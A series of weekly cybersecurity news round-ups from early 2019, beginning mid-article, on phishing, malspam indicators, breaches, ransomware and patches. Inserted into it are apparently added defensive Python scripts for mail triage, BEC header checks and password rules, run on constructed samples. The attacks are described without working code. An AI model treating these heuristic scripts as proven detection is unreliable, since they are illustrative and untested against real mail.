This topic has resulted in many debates, with a lot of people thinking HTTPS is pointless during the update process and that focus on signing the packages (with digital certificates) is more important. This was evident this week as those against HTTPS took to Twitter to defend HTTP and its benefits when used for updates, stating that HTTPS adds a level of complexity, hampers performance and makes it difficult to cache content using multiple mirrors (repositories).

Ubuntu and Debian Linux have issued patches for this vuln and security notices can be found at the links below. It is recommended that you update your servers ASAP to prevent this threat. If you have concerns about performing the update, Max’s post above gives details on how you can disable redirects during the update process.

Ubuntu Security Notice: https://usn.ubuntu.com/3863-2/
Debian Security Notice: https://www.debian.org/security/2019/dsa-4371

And that’s it for this week, please don’t forget to tune in for our next instalment.

Sign Up

To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailList

You can also follow us using the social media links provided.

If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReview

Ironshare – Security Simplified

Edition #26 – 25th January 2019

By Stuart Hare on 24/1/19

Cyber Round-up

Cyber Round-up for 18th January


Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

  • Fortnite User Accounts at Risk from Old School Attacks
  • Pre-Valentine’s Love Letters deliver Malware
  • Collection #1 Data Breach
  • Running a TP-Link VPN Router? Then it’s Time to Patch
  • HMRC Tax Refund Phishing Emails

Fortnite User Accounts at Risk from Old School Attacks

Fortnite, the mega popular last man standing online game by Epic Games, has been in the news this week for another vulnerability, this time allowing hackers to gain unauthorised access to users’ accounts without their login details.

In a blog post by Checkpoint, researchers discovered that flaws in the Epic Games account login page could be exploited by attackers to perform a malicious redirection to an attacker-controlled Epic Games sub-domain, allowing them to capture the authentication token required to access a user’s account. Checkpoint identified that the sub-domain ‘ut2004stats.epicgames.com’, a legacy service used by the classic game Unreal Tournament, was vulnerable to old school Cross Site Scripting (XSS) and SQL injection attacks. By exploiting these vulnerabilities, Checkpoint planted JavaScript on the ut2004stats server which was responsible for resending and capturing token requests. This was tested using Fortnite’s Facebook login, but it is understood that any of the authentication providers (Google, PlayStation, Xbox etc.) would have been impacted too.

By simply sending a message to a user that contains a link promising free game credits (v-bucks), victims are enticed to click the link, which results in the authentication token being captured without the need for login details to be entered. Once captured, the attacker has full access to the user’s account and all the personal information contained within it. This includes the ability to make huge in-game purchases using the credit card information attached to the account. By gifting these purchases to another hacker-controlled account they can be sold on to other users for real world cash, thus helping to fund further cyber criminal activities.

Checkpoint have confirmed that they disclosed the vulns to Epic Games prior to going public, and Epic have since patched and resolved all issues.

We recommend:

  • Being on the lookout for Fortnite scams, this is not the first and won’t be the last.
  • Never click on links that promise free goods, skins and credits (v-bucks), even those sent from friends.
  • Enable two factor authentication, to ensure reauthentication from any new devices trying to access your accounts.

For a more technical breakdown of the attack please see the Checkpoint Research site.

Pre-Valentine’s Love Letters deliver Malware

It’s not even February yet, and we are already seeing Valentine’s cards in the local shops and Love Letter malspam in our email. A huge malware spam campaign dubbed ‘Love Letter’ has been found in the wild and is delivering more than just the usual romantic terms of endearment.

The Love Letter campaign sends out romantically titled emails containing malicious ZIP file attachments which, when opened, contain a JavaScript file that infects the victim’s machine with not so loving malware. Distributed by this campaign is malware such as GandCrab ransomware and XMRig crypto coin miners. On top of these infections, researchers also found that an infected host became a node in the Phorpiex spambot, which is then used to increase the spread of this malspam campaign.

Look out for emails that are sent from the following addresses or contain the following subjects, and never open attachments from unknown or untrusted sources.

  • From: Teddy Bailey <Teddy31@8038[.]com>
  • From: Imogene Carter <Imogene99@0354[.]com>
  • From: Imelda Jones <Imelda31@1529[.]com>
  • From: Ted Hall <Ted93@4302[.]com>
  • From: Deanne Harris <Deanne11@5387[.]com>
  • Subject: Always thinking about you
  • Subject: Felt in love with you!
  • Subject: I love you
  • Subject: Just for you!
  • Subject: My letter just for you
  • Subject: My love letter for you
  • Subject: Wrote this letter for you
  • Subject: : D

A technical breakdown can be found on the SANS ISC Diary pages.

Collection #1 Data Breach

Troy Hunt’s Have I Been Pwned service has been hard at work this week, informing users that have been impacted by the latest data breach, Collection #1.

Collection #1 is being used as a credential stuffing list, which basically means it contains a huge amount of email address and password data collected from multiple different data breaches, which hackers can then use to automatically try and break into users’ accounts.

Troy reports that this is the single largest breach he has loaded into HIBP. In terms of numbers it includes a total of 2.69 billion credentials; 1.16 billion unique combinations of email address and password; nearly 773 million unique email addresses and 21 million unique passwords. Importantly, Collection #1 contains approximately 140 million new email addresses not previously listed in HIBP. To find out if your details are included in the Collection #1 breach, go to haveibeenpwned.com and enter your email address.

Attackers use credential stuffing lists to prey on the fact that victims will have reused their email addresses and passwords on multiple sites, so stay safe by adopting password best practices: use a unique complex password every time and never reuse the same password twice. If remembering your passwords is becoming a challenge, then give a password manager a try; there are a few to choose from, such as 1Password or LastPass.

Running a TP-Link VPN Router? Then it’s Time to Patch

Small and medium business and home office users running TP-Link VPN router devices are advised to update their device firmware after multiple vulnerabilities were disclosed to the manufacturer by Cisco Talos.

These vulns, which include critical remote code execution and denial of service flaws, specifically affect the TP-Link TL-R600VPN gigabit broadband VPN router product using firmware versions 1.2.3 and 1.3.0. It is the HTTP server component of the router that is vulnerable to exploit. This allows malicious actors to crash the device’s HTTP server, as well as run malicious code on the router that not only compromises the device but can also lead to further network and data compromise. We have seen evidence of this in the last year with the VPNFilter malware that infected over 500,000 devices worldwide.

Keeping up with the latest security patches is critical for businesses large and small to defend against cyber threats, and while businesses may ensure that PCs and servers are updated regularly, devices such as internet routers, network switches and IoT devices are often forgotten about. Make sure that you include these types of devices when reviewing and deploying your regular updates.

For a deep dive breakdown of the vulnerabilities mentioned here see the blog post on talosintelligence.com.

HMRC Tax Refund Phishing Emails

To close out this week’s round-up we just want to remind readers of the increased level of tax scams and phishing campaigns in circulation at the moment. We are in the middle of the Self-Assessment peak for HMRC, where all UK taxpayers are required to submit and pay their tax self-assessments by January 31st, which makes it a prime time for criminals to benefit from their scams.

These scams generally come in the form of genuine looking phishing emails, but more commonly we are seeing cold calling used as the delivery method. The aim of these scams is to steal your personal information and identity, but they can also lead to money being stolen from your bank accounts.

Below is a typical example of a tax refund scam email we have dealt with this week.

Tax scam email

Some key things to look out for:

  • The sender states it’s from hmrc.gov.uk but the actual address is something very different.
  • In this email there are no HMRC logos; this may not always be the case though, as actors also use official logos to make the emails look more convincing.
  • The link to log in and collect your refund does not take you to an HMRC website. By simply hovering over the link you can check where it’s going to send you. Never just click on links in emails.
  • Although HMRC do contact taxpayers by email, they will always include your unique taxpayer reference number in any contact with you, and they are no longer including links in their official emails.

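As an added example, not Ironshare’s code or any vendor product, the Python script below turns the checks in this list and the Love Letter sender and subject indicators from the 18th January round-up into a small mail triage routine, run over a few constructed sample messages. The trusted-host suffixes (hmrc.gov.uk and other gov.uk hosts), the risky attachment extensions, and the sample addresses, links and attachment are assumptions made for illustration; only the indicator lists come from the posts.

```python
"""Triage inbound mail with the indicators and sender/link checks from the round-ups.
Added example, not Ironshare's code or a vendor product. All samples are constructed."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Sender addresses (defanged as '8038[.]com' in the write-up, refanged here) and
# subject lines listed for the Love Letter campaign.
LOVE_LETTER_SENDERS = {a.replace("[.]", ".").lower() for a in (
    "Teddy31@8038[.]com", "Imogene99@0354[.]com", "Imelda31@1529[.]com",
    "Ted93@4302[.]com", "Deanne11@5387[.]com")}
LOVE_LETTER_SUBJECTS = {s.lower() for s in (
    "Always thinking about you", "Felt in love with you!", "I love you",
    "Just for you!", "My letter just for you", "My love letter for you",
    "Wrote this letter for you", ": D")}
# Assumption: a genuine HMRC link points at hmrc.gov.uk or another gov.uk host.
TRUSTED_SUFFIXES = ("hmrc.gov.uk", "gov.uk")
RISKY_EXTENSIONS = (".zip", ".js")  # the Love Letter ZIP-with-JavaScript lure


class LinkExtractor(HTMLParser):
    """Collect href targets, i.e. what hovering over a link would reveal."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def host_is_trusted(host):
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def extract_links(text):
    parser = LinkExtractor()
    parser.feed(text)  # HTML anchors; the regex also catches bare URLs in plain text
    return set(parser.hrefs) | set(re.findall(r"https?://[^\s\"'<>]+", text))


def triage(raw):
    """Return sorted findings for one RFC 822 message supplied as a string."""
    msg = message_from_string(raw, policy=policy.default)
    display, addr = parseaddr(msg.get("From", ""))
    addr = addr.lower()
    subject = (msg.get("Subject") or "").strip()
    findings = set()
    # 1. Known Love Letter indicators.
    if addr in LOVE_LETTER_SENDERS:
        findings.add("known-malspam-sender")
    if subject.lower() in LOVE_LETTER_SUBJECTS:
        findings.add("known-malspam-subject")
    # 2. Display name claims a domain that the real sender address does not belong to.
    actual_domain = addr.rsplit("@", 1)[-1]
    for claimed in re.findall(r"[a-z0-9.-]+\.[a-z]{2,}", display.lower()):
        if not (actual_domain == claimed or actual_domain.endswith("." + claimed)):
            findings.add(f"display-name-domain-mismatch:{claimed}")
    # 3. A message posing as HMRC whose links lead somewhere outside gov.uk.
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body else ""
    if "hmrc" in (display + " " + subject).lower():
        for url in extract_links(text):
            host = urlparse(url).hostname
            if host and not host_is_trusted(host):
                findings.add(f"untrusted-link:{host}")
    # 4. Archive or script attachments.
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if name.lower().endswith(RISKY_EXTENSIONS):
            findings.add(f"risky-attachment:{name}")
    return sorted(findings)


# Constructed samples; the ZIP payload is a dummy base64 string, not real malware.
LOVE_LETTER_SAMPLE = """\
From: Teddy Bailey <Teddy31@8038.com>
Subject: I love you
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: application/zip; name="Love_Letter.zip"
Content-Disposition: attachment; filename="Love_Letter.zip"
Content-Transfer-Encoding: base64

UEsDBA==
--b1--
"""
HMRC_SAMPLE = """\
From: "HMRC - hmrc.gov.uk" <refund-notice@mail-service.example>
Subject: Your HMRC tax refund is ready
Content-Type: text/html

<p>You are due a refund.</p><a href="http://hmrc-refund-claims.example/login">Claim now</a>
"""
CLEAN_SAMPLE = """\
From: Alice <alice@example.org>
Subject: Lunch menu
Content-Type: text/plain

Menu is at https://example.org/menu
"""

if __name__ == "__main__":
    for name, raw in (("love_letter", LOVE_LETTER_SAMPLE), ("hmrc", HMRC_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, triage(raw))
```

The display-name check is the programmatic form of the first bullet: the visible name advertises hmrc.gov.uk while the envelope address belongs elsewhere. Link checking only fires when the message claims to be from HMRC, so ordinary mail with external links is not flagged.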
For guidance on how to recognise real HMRC contact please see the official website.

As always, remain aware and stay safe online.

And that’s it for this week, please don’t forget to tune in for our next instalment.

Ironshare – Security Simplified

Edition #25 – 18th January 2019

By Stuart Hare on 18/1/19

Cyber Round-up

Cyber Round-up for 11th January


Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

  • The Perils of Buying Cheap Software
  • MS Patch Tuesday – Jan 2019
  • The RansomPhish Attack!
  • MongoLock Wiper Malware

The Perils of Buying Cheap Software

Everyone these days seems to be on the lookout for bargains, and the internet has become a great tool for quickly hunting down the best prices for your next big purchase. Cheap illegal software has been available on the internet for many years now, but what about the ultimate bargain for legit licensed software?

This week a KrebsonSecurity report has covered the findings of licensed Microsoft Office Professional software being sold online for an unbelievably low cost of under $4.00 (£3.14). The eBay seller is advertising the instant email delivery of a Microsoft Office 365 subscription for 5 users, which typically retails at £79.99 per year.

“Too good to be true” you say, “there must be a catch?” and of course there is. Although the software subscription is legit, the eBay merchant is actually reselling the accounts for existing Office 365 subscriptions. Once the purchase is completed the merchant will email the buyer with someone else’s username and password account details. What's more, you can never change these details to your own email or password as the account is locked down. At this point, if the low cost hasn’t raised a red flag for you, hopefully this will.

Where the security issues really kick in is with the OneDrive file storage included with the subscription. To ensure you have access to your documents from anywhere, Office 365 provides cloud-based file storage called OneDrive, which Office will prompt you to sync and save all your documents to. By doing so, anyone that purchases this subscription and uploads their documents to this OneDrive account is basically giving the merchant administrator full access to all of their OneDrive documents. Depending on the information contained, this could result in a data breach, data theft, fraud or identity theft.

As you can see the low initial cost comes at a very big price. When looking for your next software purchase, always buy from a reputable trusted source, to ensure that you and your information stay safe and secure.

MS Patch Tuesday – Jan 2019

In this month’s Patch Tuesday Microsoft has disclosed a total of 49 vulnerabilities in its products, which includes 7 rated Critical and 40 rated Important.

The MS Edge based Chakra scripting engine appears again this month, with 3 critical memory corruption vulns that could allow code to be executed in the context of the current user. This is achieved by getting a user to visit a specially crafted website that manipulates objects in memory.

Windows Hyper-V, Microsoft’s virtual machine hypervisor, includes 2 critical remote code execution vulns. Because the host fails to properly validate input from the guest operating system, an attacker can run a crafted application on a guest machine to execute code on the host server. This affects Windows 10 and Windows Server operating systems.

The Windows DHCP client, responsible for automatically assigning IP addresses to a system, contains a critical code execution vulnerability. This vuln can be exploited by an attacker sending crafted responses to the DHCP client. This affects Windows 10 and Windows Server operating systems.

The final critical vuln this month exists in the MS Edge browser and how it fails to handle memory objects properly. Like the Chakra vuln above, this can be exploited when the user visits a specially crafted website.

Staying up to date with security patches for your operating systems and software is a critical part of delivering and maintaining a strong security posture, so please ensure you test and update as quickly as possible to prevent exploitation and stay secure. The January Patch Tuesday release notes can be found here, while the Security Guidance and CVEs can be found here.

The RansomPhish Attack!

Have you ever come across a RansomPhish attack? No? Well unsurprisingly, before this week neither had we. As you might guess from our poor excuse of a name, the MalwareHunterTeam reported on Wednesday that they had discovered a new variant of ransomware (believed to be HiddenTear) that not only infects your system and encrypts files but also includes a PayPal phishing attack in the ransom note.

The ransom note displays the usual warning message that your files have been encrypted and explains that $40 in bitcoin must be paid to get access to your files. A bitcoin wallet ID and a PayPal Buy Now button are included at the end of the note. Victims who click on the Buy Now button are immediately sent to a PayPal-like account screen (no login required) which reports that your account access is limited. Your credit card and personal information is then requested to restore your account. Once the victim has handed over all their juicy information to the attacker, they are told the account is fully restored and they will be redirected to their account.

This is a big double hit for potential victims, who not only face the traumatic events of a ransomware attack but will also need to deal with the identity theft and financial fraud attacks that follow. Fortunately for the victims of this ransomware there is a free decryption tool available from @demonslay335, so please do not pay the ransom.

With these types of attacks, we recommend the following:

  • Never engage with the attackers and pay the ransom.
  • Never click on links unless you know they are from a trusted source.
  • Have a good backup process in place that allows you to restore your systems and files in the event of a ransomware attack.
  • Always update your systems regularly, with the latest security patches.

MongoLock Wiper Malware

According to a blog by Trend Micro, the MongoLock ransomware that was targeting unprotected MongoDB databases in mid-2018 has a new variant that acts more like wiper malware than ransomware.

Although this new version of MongoLock doesn’t delete the whole contents of the system’s hard drive (like traditional wiper malware), upon infection it immediately scans the system and starts to delete important data files instead of encrypting them. MongoLock scans and deletes files and folders from typical locations such as Documents, Desktop, Recent and Favourites, while also hunting out any backup volumes and deleting their contents. A ransom note is copied to the infected machine, informing the victim that their files and database have been copied to the attackers’ secure servers, and that by sending the attackers 0.1 Bitcoin they can recover their lost data.

Unfortunately, this is not the case: analysis by the Trend Micro team found that any deleted files were unrecoverable. As mentioned above, always ensure that you have a robust backup process in place, as you will need it if you want to recover from a MongoLock infection.

For more info the Trend Micro blog can be found here.

And that’s it for this week, please don’t forget to tune in for our next instalment.

Ironshare – Security Simplified

Edition #24 – 11th January 2019

By Stuart Hare on 10/1/19

Cyber Round-up

Cyber Round-up for 4th January


Happy new year and welcome to the first Ironshare Cyber Round-up of 2019. We look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

  • The First Data Breach of 2019
  • DataResolution.net Suffers Christmas Ransomware Attack
  • Security Firm Hijacks Twitter Accounts
  • UK Tax Scams

The First Data Breach of 2019

Well, we didn’t have to wait long for the news of 2019’s first reported data breach. Within 24 hours of the new year celebrations, the Victorian Government in Australia reported that it had detected unauthorised access to its Government Directory, resulting in the details of 30,000 public servants being compromised. The breach is believed to have been accomplished after a successful email phishing attack on a government employee.

The Victorian Government Directory contains the work and contact details of its employees, including name, job roles, email addresses and phone numbers. Fortunately, the breach did not involve the compromise of any financial information.

An email to staff read:

‘On 22 December 2018 an unauthorised third party accessed and downloaded a partial copy of the Victorian government employee directory, which identified approximately 30,000 public service staff and contractors. It appears the third party accessed the list after compromising an employee’s email account.’

Although information like that leaked here may be found through other online sources (e.g. social media, LinkedIn), businesses should be aware that malicious actors can use this information to understand the structure of an organisation and use it to launch a more targeted attack, such as Business Email Compromise.

If you haven’t thought about this already, start your new year with an audit of your business’s security. Understanding where your risks and vulnerabilities are will help you to plug the gaps and reduce the opportunities for the bad guys to exploit your systems and data.

https://www.abc.net.au/news/2019-01-01/victorian-government-employee-directory-data-breach/10676932

DataResolution.net Suffers Christmas Ransomware Attack

DataResolution.net was sent an unwanted gift on Christmas Eve in the form of the RYUK ransomware. Since then, the cloud hosting provider has been working to bring its systems back online and restore service for its 30,000 customers.

An update was provided to customers on 29th December stating that attackers used a compromised account to access the Data Resolution systems, giving them access to the data centre’s domain. This allowed the actors to lock out access to the company systems before moving quickly to infect servers with the RYUK ransomware. This was not the only report of RYUK infections over the Christmas period, with multiple major US news publishers reportedly suffering the same fate.

In an update to their customers, Data Resolution was quick to blame North Korea for the attack, stating that the group had hit 150 banks in the last year. How they can so confidently attribute this to an actor or group while still in the process of recovery is odd, but we assume that this is simply due to the Checkpoint report released in August last year that associates this ransomware with the notorious North Korean Lazarus group.

As of the 2nd January most of the provider’s services are still pending or in the process of recovery.

https://krebsonsecurity.com/2019/01/cloud-hosting-provider-dataresolution-net-battling-christmas-eve-ransomware-attack/

Security Firm Hijacks Twitter Accounts

In an attempt to highlight flaws in the Twitter social media platform, security firm Insinia Security briefly hijacked a number of high-profile Twitter accounts. Insinia have been warning about the problems of using SMS text messaging for some time, and in late December decided to publicise the issue by taking brief control of celebrity Twitter accounts, including those of Eamonn Holmes and Louis Theroux.

The Twitter flaw in question allows anyone with your phone number to tweet to your account. By understanding how Twitter handles incoming texts from a phone number, Insinia were able to post to and fully control a hijacked account. As part of the process they posted a tweet stating that the hijacked account was now under the control of Insinia Security.

These actions have led to mixed feelings across the security community. Some feel this was necessary to get Twitter to take action and force a fix to this known flaw. The majority though appear to feel that this act was unethical and irresponsible. As Insinia gained unauthorised access to Twitter accounts, there are grounds that their actions were also potentially illegal, committing an offence under the Computer Misuse Act, which shines a bad light on the security research community.

Insinia stand by their decisions and state that no unethical or illegal actions were taken to prove this flaw. They highlight that these methods can easily be used to spread fake news, carry out social engineering, damage reputations and distribute malware.

If you are concerned that you could be directly affected by this flaw, then it is recommended to remove your phone number from your Twitter account.

BBC Report: https://www.bbc.co.uk/news/technology-46700995
Insinia Blog post: https://medium.com/insinia/this-account-has-been-hijacked-temporarily-4909fa190f5d

UK Tax Scams

January is Tax Return season in the UK, so please be aware that there are a number of tax-related scams in circulation. These scams come in the form of genuine looking phishing emails, but more commonly we are seeing cold calling used as the delivery method. The aim of these scams is to steal your personal information and identity, but they can also lead to money being stolen from your bank accounts.

These automated telephone cold calls threaten the victims with arrest and legal action due to unpaid tax bills, in order to get them to call a fake HMRC number so the bad guys can steal their information. If you receive one of these scam emails or phone calls, never call these numbers or click on the links in these fake emails; always go direct to the HMRC website for the real contact details.

Although HMRC do contact taxpayers by automated phone calls for late bills etc., they will never threaten legal action or arrest, and they will always include your unique taxpayer reference number in any contact with you. For guidance on how to recognise real HMRC contact please see the official website.

As always, remain aware to stay safe online.

And that’s it for this week, please don’t forget to tune in for our next instalment.

Sign Up

To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailList

You can also follow us using the social media links provided.

If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReview

Ironshare – Security Simplified

Edition #23 – 4th January 2019

By Stuart Hare on 3/1/19

Cyber Round-up for 21st December

Welcome to the Christmas edition of Ironshare’s Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views and highlights from the world of Security.

Apple ID Phishing Campaign Tricks Users with Fake App Store Receipts

An email phishing campaign has been seen doing the rounds, targeting Apple users by pretending to be a receipt for an item purchased on the App Store. The email arrives stating confirmation of the purchase and invites you to check the attached PDF document for details.

This type of attack relies on the user’s shock factor: they react and open the attachment on the basis that they haven’t made such a purchase on the App Store. Although the initial email is not the most convincing phish seen, the rest of the attack that follows is. The PDF receipt at first glance looks legit but contains a number of shortened links that redirect to the phishing site.

A victim that clicks on a link to report an incorrect purchase is sent to a site identical to the real Apple web pages, and although the web address does not belong to Apple it is marked as Secure, so could trick users into thinking it’s a valid Apple site.

The attackers start by requesting the Apple ID and password, which once entered sends the victim to another page that informs them their account has been locked for security reasons. In fear that their account has been hacked, the victim may continue to try and unlock their account, sending them to another Apple-looking page, where the actors then look to gain more personal information including full name, address, payment information, security questions etc.

Once all the information has been entered and submitted, a new page appears to confirm that the account has been verified and states it will automatically log you out. The really sneaky part then comes when the phishing site redirects to the real Apple login page and displays a warning that the session was timed out for your security. We believe that this is to try and convince the victim that all is now well, when in fact the actors now have enough information to carry out identity theft and fraud against the victim.

To protect yourself from these phishing threats:

  • always look out for suspicious email senders and URLs;
  • never open attachments or click links from untrusted sources;
  • if you are certain you have made no purchase and have concerns about your account, do not open the attachment, go direct to the Apple site and report the issue;
  • remember that Apple will never ask for all your personal information to recover your account.

For more details on this campaign, including example screenshots of the email, receipt and phishing site, please see Lawrence Abrams' Bleeping Computer post on the topic.

Email Fraud Continues to Rise in 2018

A recent post by Proofpoint has highlighted a significant rise in email fraud and targeted email attacks this year, with stats showing an 80% increase in Q3 compared with the previous year. Email fraud is a targeted method of attack that includes techniques such as Business Email Compromise (BEC).

Business Email Compromise (aka a BEC scam) involves the attackers spoofing an email to make it look like it came from a company executive, and aims to convince staff at lower levels of the organisation to part with company funds. It is reported that BEC fraud targeting just 9 US companies has resulted in losses of approximately $100 million.

Proofpoint’s analysis of these worldwide attacks shows that companies have been targeted with increasing frequency each quarter of 2018. Proofpoint state that the proportion of companies that were targeted by more than 50 BEC attacks in a quarter nearly doubled, from 11% to 20%, over the previous year.

Malicious actors use multiple techniques to carry out these types of attacks, including email display name spoofing, domain spoofing and lookalike domains.

With these types of email threats continuing to pay dividends to attackers, it is important that your organisation ensures it is protected. Strong email defences are required that use email security solutions such as Cisco Email Security and incorporate technologies such as SPF, DKIM and DMARC, which can help to prevent spoofing.

As a precaution, if you receive an email like this apparently from one of your executives, always confirm in person that they sent it and that their instruction is legitimate.
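To make the three techniques above concrete from the defender's side, here is an added example (not from the Proofpoint post, nor Ironshare's own tooling) of the header checks a mail gateway or SOC script could run against incoming mail. The organisation's domain example.co.uk, the executive list, the similarity threshold and the four sample messages are all constructed for the illustration; the Authentication-Results header it reads is the one your own gateway writes after its SPF and DKIM checks.

```python
"""Header-level triage for the three BEC techniques named in the post:
display-name spoofing, domain spoofing and lookalike domains.

Added example; the domain, the executive list, the threshold and the
sample messages are constructed for illustration."""
import difflib
from email import message_from_string
from email.utils import parseaddr

# Constructed: the organisation's own domain and the people most worth impersonating.
OUR_DOMAIN = "example.co.uk"
EXECUTIVES = {"jane smith": "jane.smith@example.co.uk"}
# Constructed threshold: how similar a foreign domain must be to ours to count as a lookalike.
LOOKALIKE_RATIO = 0.8


def sender_parts(msg):
    """Return (display name, address, domain) from the From header, all lower-cased."""
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    return name.strip().lower(), addr.lower(), domain


def check_message(raw: str) -> list:
    """Return the BEC indicators found in one RFC 5322 message (empty list = clean)."""
    msg = message_from_string(raw)
    name, addr, domain = sender_parts(msg)
    findings = []

    # 1. Display-name spoofing: an executive's name on an address that is not theirs.
    if name in EXECUTIVES and addr != EXECUTIVES[name]:
        findings.append("display-name-spoofing")

    # 2. Domain spoofing: the From address claims our domain, but our own gateway
    #    recorded no SPF or DKIM pass. Only trust an Authentication-Results header
    #    written by your own gateway; a sender can add one of their own.
    auth = msg.get("Authentication-Results", "").lower()
    if domain == OUR_DOMAIN and "spf=pass" not in auth and "dkim=pass" not in auth:
        findings.append("domain-spoofing")

    # 3. Lookalike domain: a foreign domain that is a near miss for ours (exarnple, examp1e ...).
    if domain and domain != OUR_DOMAIN:
        ratio = difflib.SequenceMatcher(None, domain, OUR_DOMAIN).ratio()
        if ratio >= LOOKALIKE_RATIO:
            findings.append("lookalike-domain")

    return findings


def build(from_header: str, auth_results: str) -> str:
    """Assemble a minimal raw message (constructed sample data)."""
    return "\n".join([
        f"From: {from_header}",
        "To: finance@example.co.uk",
        "Subject: Urgent payment",
        f"Authentication-Results: {auth_results}",
        "",
        "Please process the attached invoice today.",
    ])


# Constructed samples: one per technique, plus a genuine message from the executive.
SAMPLES = {
    "free-mail-with-exec-name": build(
        "Jane Smith <jane.smith.ceo@gmail.com>",
        "mx.example.co.uk; spf=pass smtp.mailfrom=gmail.com; dkim=pass header.d=gmail.com"),
    "forged-own-domain": build(
        "Jane Smith <jane.smith@example.co.uk>",
        "mx.example.co.uk; spf=fail smtp.mailfrom=example.co.uk; dkim=none"),
    "lookalike": build(
        "Accounts Payable <ap@exarnple.co.uk>",
        "mx.example.co.uk; spf=pass smtp.mailfrom=exarnple.co.uk; dkim=pass header.d=exarnple.co.uk"),
    "genuine": build(
        "Jane Smith <jane.smith@example.co.uk>",
        "mx.example.co.uk; spf=pass smtp.mailfrom=example.co.uk; dkim=pass header.d=example.co.uk"),
}


def triage(samples: dict) -> dict:
    """Run check_message over a labelled set of raw messages."""
    return {label: check_message(raw) for label, raw in samples.items()}


if __name__ == "__main__":
    for label, findings in triage(SAMPLES).items():
        print(f"{label:26} {findings or 'clean'}")
```

The similarity check is deliberately simple; in production you would also feed a list of your registered lookalike domains and the brands you do business with, and treat a domain-spoofing hit as a DMARC policy failure rather than a heuristic.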

8th Annual Worst Password List

SplashData, the makers of the password manager software SplashID and TeamsID, have recently released their 8th annual worst password list. The list is based on their analysis of over 5 million passwords that have been leaked on the internet through the constant flurry of data breaches and attacks that continue to plague companies worldwide.

Topping the list as the worst and most used password, for the 5th year in a row, is ‘123456’, with the following rounding out the top ten.

  1. 123456
  2. password
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567
  8. sunshine
  9. qwerty
  10. iloveyou

This makes for depressing news: especially in light of the continued reports of data, privacy and account information breaches, users are still not learning that better password security is required to protect their personal information.

Users are advised to follow good practice when creating new passwords:

  • Always create strong passwords that are not easy to guess.
  • Never use simple passwords like those above or include names, usernames, family names, date of birth etc.
  • Try to use three completely random words, or combine upper and lower case letters, numbers and special characters (!£$*#).
  • Never use the same password twice, ensure that passwords are unique for each account / site you visit.
  • If you struggle to create unique memorable passwords, then try using a password manager to do this for you.
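As an added example of turning the advice above into an automatic check (this is not SplashData's or Ironshare's code), the following Python function rejects a candidate password that appears on the list above, that contains supplied personal details or a date of birth, or that is neither a three-word passphrase nor a mix of character classes. The date formats and the sample inputs are assumptions made for the illustration; reuse across accounts is a cross-site property that only a password manager can check, so it is not covered here.

```python
"""Checks a candidate password against the guidance in the post.

Added example; the rules, date formats and sample inputs are constructed
for illustration."""
import re
from datetime import date
from typing import Optional

# The ten entries quoted in the post, compared case-insensitively.
WORST_PASSWORDS = {
    "123456", "password", "123456789", "12345678", "12345",
    "111111", "1234567", "sunshine", "qwerty", "iloveyou",
}
# Constructed: ways a person might type their birthday into a password.
DOB_FORMATS = ("%d%m%Y", "%d%m%y", "%d/%m/%Y", "%d-%m-%Y", "%Y%m%d", "%Y")
# lower, upper, digit, special: the classes the post asks users to combine.
CHARACTER_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^\w\s]")


def assess(password: str, *, personal=(), dob: Optional[date] = None) -> list:
    """Return the reasons a password fails the guidance; an empty list means it passed."""
    reasons = []
    lowered = password.lower()

    if lowered in WORST_PASSWORDS:
        reasons.append("on the worst-password list")

    # Names, usernames, family names: any term of three or more characters found inside.
    for term in personal:
        if len(term) >= 3 and term.lower() in lowered:
            reasons.append(f"contains personal detail '{term}'")

    if dob is not None and any(dob.strftime(fmt) in password for fmt in DOB_FORMATS):
        reasons.append("contains date of birth")

    # Either route from the advice: three or more words, or a mix of character classes.
    words = [w for w in re.split(r"[\s._-]+", password) if w]
    classes = sum(1 for pattern in CHARACTER_CLASSES if re.search(pattern, password))
    if len(words) < 3 and classes < 3:
        reasons.append("neither a three-word passphrase nor a mix of character classes")

    return reasons


# Constructed inputs covering each rule.
SAMPLE_CASES = {
    "worst-list": dict(password="123456"),
    "passphrase": dict(password="correct horse battery"),
    "personal": dict(password="Stuart1985!", personal=("Stuart", "shares"), dob=date(1985, 3, 1)),
    "mixed-classes": dict(password="Tr0ub4dor&3"),
}


def run_samples() -> dict:
    """Assess every constructed case and return the reasons per label."""
    return {label: assess(**kwargs) for label, kwargs in SAMPLE_CASES.items()}


if __name__ == "__main__":
    for label, reasons in run_samples().items():
        print(f"{label:14} {reasons or 'OK'}")
```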

Microsoft Release Out of band Zero-Day Patch for Exploited Vulnerability

Only a week after the scheduled monthly Patch Tuesday release of security updates, Microsoft has been forced to release an unscheduled patch for a zero-day vulnerability in its Internet Explorer browser.

Google were responsible for bringing this vuln to Microsoft’s attention, reporting that it is being actively exploited in targeted attacks.

The vuln exists due to how the browser's scripting engine handles objects in memory. By exploiting the corrupted memory an attacker can remotely execute code on the target machine as the currently logged-in user. If the user has administrative rights to the machine, the attacker could take full control of the vulnerable system.

Information on the vulnerability and its associated security update can be found here.

